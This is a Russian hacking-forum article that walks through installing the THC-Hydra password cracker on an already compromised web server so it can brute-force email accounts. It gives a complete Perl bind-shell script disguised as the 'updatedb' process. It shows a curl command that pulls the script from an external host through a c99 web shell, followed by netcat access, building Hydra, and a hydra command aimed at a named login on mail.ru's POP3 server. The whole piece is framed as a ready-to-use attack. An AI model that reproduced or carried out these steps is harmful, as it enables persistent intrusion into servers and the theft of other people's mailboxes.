V-zlom.ru » Статьи » Как установить THC-hydra на сервак

Как установить THC-hydra на сервак

Я расскажу о том как установить THC-hydra на взломанный сервак, для брута почтовых ящиков. Плюс этого метода в том что брут работает даже при выключенном компе т.к hydra висит на серваке...

THC-Hydra - распараллеленый взломщик паролей к различным сервисам (ftp, POP3, IMAP, Telnet, HTTP Auth, NNTP, VNC, ICQ, PCNFS, CISCO и др.) для UNIX платформ. С помощью этой утилиты вы можете атаковать несколько сервисов одновременно.

Нам потребуется:
1.THC-hydra
2.c99shell(или любой другой)
3.NetCAT - утилитка для back-conect и др.
4.exploit для бинда шелла на порт...

ПРИСТУПИМ...

Переходим в веб шелле в папку /tmp/ так как чаще всего она разрешенна для записи...
Для удобсва в работе мы повесим шелл на 32762 порт и в последующим приконектимся netcat'ом...
1.Открываем блокнот и копируем туда exploit и сщхраняем как bind_port.pl
code:
#!/usr/bin/perl

$port = 32762;
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, "&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
close X;
}
Изаливаем полученный файл на хост (narod.ru).

Дальше узнаем качалку нашего веб шелла командой which CURL
В моем случае она

Как установить THC-hydra на сервак

теперь забиндим наш шелл...
командуем curl -O ./bind_port.pl http://phpaa.narod.ru/bind_port.pl;ls -la bind* - это эксплойт загруженный на narod.ru...
Должно получится ввот так:

Как установить THC-hydra на сервак

Теперь открываем netcat и вбиваем туда ваш сайт и порт и жмем enter...

code:
site.ru 32762
Как установить THC-hydra на сервак

Произошол коннект...
Теперь заливаем гидру...

пишим:

code:
wget http://freeworld.thc.org/releases/hydra-5.4-src.tar.gz
Как установить THC-hydra на сервак

Теперь комплим закаченный архив...

code:
tar xvzf hydra-5.4-src.tar.gz
Как установить THC-hydra на сервак

Теперь переходим в папку с гидрой и устанавливаем...

code:
cd hydra-5.4-src/
И переходим к установки

code:
./configure
Как установить THC-hydra на сервак

далие следует команда

code:
make
Как установить THC-hydra на сервак

Установка законченна запускаем командой

code:
./hydra
Как установить THC-hydra на сервак

Теперь закидываем на сервак большой словарь с паролями и сохраняем его. В моем случае он называется dic и log в нем будут сохранятся отчеты...
Заливаем на гидру сомандой cp dic hydra-5.4-src/dic и cp log hydra-5.4-src/log
И можно приступать к бруту...
Командуем ./hydra -l 1xss -P dic -o log.txt -f pop.mail.ru pop3
-l - login жертвы
-P - Словарь пассов
-o - лог отчетов
-f - pop.mail.ru pop3 - думаю ясно))

И можно ложится спать, утром смотрим лог)))

  • Автор: makar
  • Комментарии: 0
  • Просмотры: 1287
0

Добавить комментарий

Вы не авторизованы и вам запрещено писать комментарии. Для расширенных возможностей зарегистрируйтесь!